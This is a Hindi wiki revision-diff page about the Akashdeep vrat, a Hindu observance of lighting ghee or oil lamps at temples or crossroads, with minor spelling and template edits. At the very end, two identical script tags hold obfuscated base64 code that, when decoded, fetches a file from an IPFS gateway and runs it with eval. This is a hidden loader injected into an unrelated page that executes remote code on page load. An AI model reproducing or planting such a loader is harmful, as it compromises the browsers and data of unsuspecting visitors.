Difference between revisions of "आकाश दीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*आकाशदीप व्रत में किसी [[देवता]] के लिए या किसी मन्दिर या किसी चौराहे पर घृत या तेल के दीप जलाये जाते है। <ref>अपरार्क (370-372, दीपदान); [[मनुस्मृति]] (4|29); राजमार्तण्ड (1351-57); निर्णयसिन्धु (195)।</ref>
+
*आकाशदीप व्रत में किसी [[देवता]] के लिए या किसी मन्दिर या किसी चौराहे पर घृत या तेल के दीप जलाये जाते हैं।<ref>अपरार्क (370-372, दीपदान); [[मनुस्मृति]] (4|29); राजमार्तण्ड (1351-57); निर्णयसिन्धु (195)।</ref>
{{लेख प्रगति
+
{{प्रचार}}
|आधार=आधार1
+
{{संदर्भ ग्रंथ}}
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 05:28, 14 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • akashadip vrat mean kisi devata ke lie ya kisi mandir ya kisi chaurahe par ghrit ya tel ke dip jalaye jate haian.[1]


tika tippani aur sandarbh

  1. aparark (370-372, dipadan); manusmriti (4|29); rajamartand (1351-57); nirnayasindhu (195).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>